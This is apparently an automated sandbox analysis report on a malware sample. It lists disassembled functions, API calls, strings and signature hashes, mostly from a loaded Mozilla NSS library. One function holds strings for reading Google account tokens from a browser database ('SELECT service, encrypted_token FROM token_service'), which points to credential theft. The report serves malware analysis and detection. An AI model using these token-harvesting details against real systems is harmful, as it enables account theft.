                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB94E30
                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB94E4D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • misuse, xrefs: 6CB94E42
                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB94E38
                                                                                                                                                                                                              • invalid, xrefs: 6CB94E25
                                                                                                                                                                                                              • API call with %s database connection pointer, xrefs: 6CB94E2A
                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CB94E47
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                              • API String ID: 632333372-2974027950
                                                                                                                                                                                                              • Opcode ID: c9c4e9364f2f35c71a7c2291cc19aa6a6f26adefd267284b2ce07025ad57a781
                                                                                                                                                                                                              • Instruction ID: ca99fbab200924b490f18d642ef03400c21e7abceaecab43407bf23f7b192367
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9c4e9364f2f35c71a7c2291cc19aa6a6f26adefd267284b2ce07025ad57a781
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78F02729F84DE82FEA1810259D10F963785DB0B33DF19C5B2EA3877F92D305986946E2
                                                                                                                                                                                                              Function 009299E1 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 224stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00929B87
                                                                                                                                                                                                                • Part of subcall function 00931DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00936973,?), ref: 00931E0C
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00929BA4
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00929C53
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00929C6E
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpylstrlen$lstrcat$AllocLocal
                                                                                                                                                                                                              • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                              • API String ID: 3306365304-1713091031
                                                                                                                                                                                                              • Opcode ID: 8b7117e8c1996a82da07fc325f9eeec6d1d5b24f9619c6882b6c68bd47b1eb99
                                                                                                                                                                                                              • Instruction ID: 122b6b2df7fa1fac79941a06d17a9c5b78cf5dc648164f03f5dd9d9d66b3e042
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b7117e8c1996a82da07fc325f9eeec6d1d5b24f9619c6882b6c68bd47b1eb99
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC811736900129ABCF01FBA5EE47ADDB774AF94305F510120F944B716ADF70AE8A8F91
                                                                                                                                                                                                              Function 6CB00C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000,6CB01444,?,00000001,?,00000000,00000000,?,?,6CB01444,?,?,00000000,?,?), ref: 6CB00CB3
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CB01444,?,00000001,?,00000000,00000000,?,?,6CB01444,?), ref: 6CB00DC1
                                                                                                                                                                                                              • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CB01444,?,00000001,?,00000000,00000000,?,?,6CB01444,?), ref: 6CB00DEC
                                                                                                                                                                                                                • Part of subcall function 6CB20F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CAC2AF5,?,?,?,?,?,6CAC0A1B,00000000), ref: 6CB20F1A
                                                                                                                                                                                                                • Part of subcall function 6CB20F10: malloc.MOZGLUE(00000001), ref: 6CB20F30
                                                                                                                                                                                                                • Part of subcall function 6CB20F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CB20F42
                                                                                                                                                                                                              • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CB01444,?,00000001,?,00000000,00000000,?), ref: 6CB00DFF
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CB01444,?,00000001,?,00000000), ref: 6CB00E16
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CB01444,?,00000001,?,00000000,00000000,?), ref: 6CB00E53
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,6CB01444,?,00000001,?,00000000,00000000,?,?,6CB01444,?,?,00000000), ref: 6CB00E65
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CB01444,?,00000001,?,00000000,00000000,?), ref: 6CB00E79
                                                                                                                                                                                                                • Part of subcall function 6CB11560: TlsGetValue.KERNEL32(00000000,?,6CAE0844,?), ref: 6CB1157A
                                                                                                                                                                                                                • Part of subcall function 6CB11560: EnterCriticalSection.KERNEL32(?,?,?,6CAE0844,?), ref: 6CB1158F
                                                                                                                                                                                                                • Part of subcall function 6CB11560: PR_Unlock.NSS3(?,?,?,?,6CAE0844,?), ref: 6CB115B2
                                                                                                                                                                                                                • Part of subcall function 6CADB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CAE1397,00000000,?,6CADCF93,5B5F5EC0,00000000,?,6CAE1397,?), ref: 6CADB1CB
                                                                                                                                                                                                                • Part of subcall function 6CADB1A0: free.MOZGLUE(5B5F5EC0,?,6CADCF93,5B5F5EC0,00000000,?,6CAE1397,?), ref: 6CADB1D2
                                                                                                                                                                                                                • Part of subcall function 6CAD89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CAD88AE,-00000008), ref: 6CAD8A04
                                                                                                                                                                                                                • Part of subcall function 6CAD89E0: EnterCriticalSection.KERNEL32(?), ref: 6CAD8A15
                                                                                                                                                                                                                • Part of subcall function 6CAD89E0: memset.VCRUNTIME140(6CAD88AE,00000000,00000132), ref: 6CAD8A27
                                                                                                                                                                                                                • Part of subcall function 6CAD89E0: PR_Unlock.NSS3(?), ref: 6CAD8A35
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1601681851-0
                                                                                                                                                                                                              • Opcode ID: 4dd78ebdce983c7d836b1b07699278ecb1d1cb14fd672a9d91779a5648ae50b4
                                                                                                                                                                                                              • Instruction ID: 3a9302638d17bc312cbeea319f35d9ac11906394e96df71ae4399ba08515c154
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4dd78ebdce983c7d836b1b07699278ecb1d1cb14fd672a9d91779a5648ae50b4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF51B8B5E002515FEB009F64ED81ABF3BA8EF49258F150124ED0997B12E721ED59C7E2
                                                                                                                                                                                                              Function 6CAD9C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CAD8850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6CAE0715), ref: 6CAD8859
                                                                                                                                                                                                                • Part of subcall function 6CAD8850: PR_NewLock.NSS3 ref: 6CAD8874
                                                                                                                                                                                                                • Part of subcall function 6CAD8850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6CAD888D
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CAD9CAD
                                                                                                                                                                                                                • Part of subcall function 6CB898D0: calloc.MOZGLUE(00000001,00000084,6CAB0936,00000001,?,6CAB102C), ref: 6CB898E5
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07AD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07CD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07D6
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA4204A), ref: 6CAB07E4
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,6CA4204A), ref: 6CAB0864
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CAB0880
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,6CA4204A), ref: 6CAB08CB
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08D7
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08FB
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAD9CE8
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,6CADECEC,6CAE2FCD,00000000,?,6CAE2FCD,?), ref: 6CAD9D01
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,6CADECEC,6CAE2FCD,00000000,?,6CAE2FCD,?), ref: 6CAD9D38
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,6CADECEC,6CAE2FCD,00000000,?,6CAE2FCD,?), ref: 6CAD9D4D
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD9D70
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD9DC3
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CAD9DDD
                                                                                                                                                                                                                • Part of subcall function 6CAD88D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CAE0725,00000000,00000058), ref: 6CAD8906
                                                                                                                                                                                                                • Part of subcall function 6CAD88D0: EnterCriticalSection.KERNEL32(?), ref: 6CAD891A
                                                                                                                                                                                                                • Part of subcall function 6CAD88D0: PL_ArenaAllocate.NSS3(?,?), ref: 6CAD894A
                                                                                                                                                                                                                • Part of subcall function 6CAD88D0: calloc.MOZGLUE(00000001,6CAE072D,00000000,00000000,00000000,?,6CAE0725,00000000,00000058), ref: 6CAD8959
                                                                                                                                                                                                                • Part of subcall function 6CAD88D0: memset.VCRUNTIME140(?,00000000,?), ref: 6CAD8993
                                                                                                                                                                                                                • Part of subcall function 6CAD88D0: PR_Unlock.NSS3(?), ref: 6CAD89AF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3394263606-0
                                                                                                                                                                                                              • Opcode ID: e7e5013c3cdfdd64500727c175487e024a7bf12de204723e1d9ff5f4066bfd7d
                                                                                                                                                                                                              • Instruction ID: 064fef80f6ba0a5a4727e144947f621e5eb64869b00132345771c29ded57d971
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7e5013c3cdfdd64500727c175487e024a7bf12de204723e1d9ff5f4066bfd7d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54514EB4A056059FDB00EF79C29469EBBF0BF44349F168529D8989BB10EB30F8C4CB91
                                                                                                                                                                                                              Function 6CBD9EA0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBD9EC0
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBD9EF9
                                                                                                                                                                                                              • _PR_MD_UNLOCK.NSS3(?), ref: 6CBD9F73
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBD9FA5
                                                                                                                                                                                                              • _PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6CBD9FCF
                                                                                                                                                                                                              • _PR_MD_UNLOCK.NSS3(?), ref: 6CBD9FF2
                                                                                                                                                                                                              • _PR_MD_UNLOCK.NSS3(?), ref: 6CBDA01D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalEnterSection
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1904992153-0
                                                                                                                                                                                                              • Opcode ID: 55ff895d9369d2fdabbb942b128fff17113744fb9715c6f53cd9c4b433f3f3e6
                                                                                                                                                                                                              • Instruction ID: 1b53c37aba842f467b0f5531d9a68cabfd60a6c9ad276a4c7589574b74598d16
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55ff895d9369d2fdabbb942b128fff17113744fb9715c6f53cd9c4b433f3f3e6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 665190B2C01641DBCB109F25D88468AB7F4FF04319F26856AD85A57B52EB31F889CFD2
                                                                                                                                                                                                              Function 6CACDCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_Now.NSS3 ref: 6CACDCFA
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBD0A27), ref: 6CB89DC6
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBD0A27), ref: 6CB89DD1
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB89DED
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CACDD40
                                                                                                                                                                                                              • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CACDD62
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6CACDD71
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(00000000), ref: 6CACDD81
                                                                                                                                                                                                              • CERT_RemoveCertListNode.NSS3(?), ref: 6CACDD8F
                                                                                                                                                                                                                • Part of subcall function 6CAE06A0: TlsGetValue.KERNEL32 ref: 6CAE06C2
                                                                                                                                                                                                                • Part of subcall function 6CAE06A0: EnterCriticalSection.KERNEL32(?), ref: 6CAE06D6
                                                                                                                                                                                                                • Part of subcall function 6CAE06A0: PR_Unlock.NSS3 ref: 6CAE06EB
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6CACDD9E
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6CACDDB7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 653623313-0
                                                                                                                                                                                                              • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                              • Instruction ID: 2d80d321d43597207e97a6b036c0cf32d020ae0cc6bcd1d583469090ee904a2d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96218EB6F421299BDF029EA4DD409DFB7B4AF05318B190024E818A7701F721E999CBE3
                                                                                                                                                                                                              Function 6CAC3C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,6CB3460B,?,?), ref: 6CAC3CA9
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAC3CB9
                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(?), ref: 6CAC3CC9
                                                                                                                                                                                                              • SECITEM_DupItem_Util.NSS3(00000000), ref: 6CAC3CD6
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAC3CE6
                                                                                                                                                                                                              • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6CAC3CF6
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAC3D03
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAC3D15
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1376842649-0
                                                                                                                                                                                                              • Opcode ID: 2e1fd769c5860c84bd61ba8315d1713d720a1fd7c1cfc78decb35d9c832b7407
                                                                                                                                                                                                              • Instruction ID: a136ce525e7e387379b66c56f5ce98cfc3ca2b1b2ffc739484121331ba0e8c3b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e1fd769c5860c84bd61ba8315d1713d720a1fd7c1cfc78decb35d9c832b7407
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C1120B5F51505ABDB011635ED058EA7B78EB0226CB284530ED1C53B11FB22DD98C6D2
                                                                                                                                                                                                              Function 6CAC9C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CAE11C0: PR_NewLock.NSS3 ref: 6CAE1216
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAC9E17
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAC9E25
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAC9E4E
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAC9EA2
                                                                                                                                                                                                                • Part of subcall function 6CAD9500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6CAD9546
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAC9EB6
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAC9ED9
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CAC9F18
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
